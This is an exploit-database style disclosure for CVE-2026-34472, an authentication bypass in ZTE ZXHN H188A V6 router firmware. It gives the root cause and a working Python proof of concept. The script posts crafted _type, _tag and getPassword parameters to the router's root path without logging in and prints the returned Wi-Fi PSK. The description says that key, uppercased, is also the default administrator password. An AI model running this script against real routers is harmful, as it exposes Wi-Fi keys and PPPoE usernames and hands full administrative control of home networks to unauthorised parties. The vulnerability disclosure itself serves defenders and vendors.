# Exploit Title: ZTE ZXHN H188A V6 - Authentication Bypass
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link:
https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router
# Version: ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE
# Tested on: ZTE ZXHN H188A V6.0.10P2_TE
# CVE: CVE-2026-34472
# Description:
# Unauthenticated requests to the root path of ZTE ZXHN H188A V6 firmware
# can reach pre-login wizard handlers and disclose WLAN PSKs, SSIDs, and
# PPPoE usernames. The leaked Wi-Fi password is also the default
administrator
# password after uppercasing, resulting in full authentication bypass.
#
# Root cause: router_logic_impl.lua accepts _type and _tag directly for
# empty-path requests. urlpath_2type_modifier.lua only applies
QuickSetupEnable
# when _type is missing. Wizard handlers then expose credential-bearing read
# actions (getPassword, wlan_get, ppp_get) for unauthenticated users.
#
# Approximately 500 publicly exposed H188A interfaces were reachable at
# time of original report (May 2024). ZTE PSIRT stopped responding; CVE
# assigned by MITRE on 2026-03-27 after escalation.
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34472
# PoC - Trigger wizard credential endpoint (Python 3 / requests)
import requests
import sys
def exploit(target):
url = f"http://{target}/"
# Craft request with _type parameter to bypass QuickSetupEnable gate
params = {"_type": "loginData", "_tag": "login_entry"}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"IF_ACTION": "getPassword", "_InstID_PASS":
"DEV.WIFI.AP1.PSK1", "PASSTYPE": "PSK"}
try:
r = requests.post(url, params=params, headers=headers, data=data,
timeout=10, verify=False)
print(f"[+] {target} HTTP {r.status_code}")
print(r.text[:2000])
except Exception as e:
print(f"[-] {target}: {e}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: poc.py <target_ip>")
sys.exit(1)
exploit(sys.argv[1])
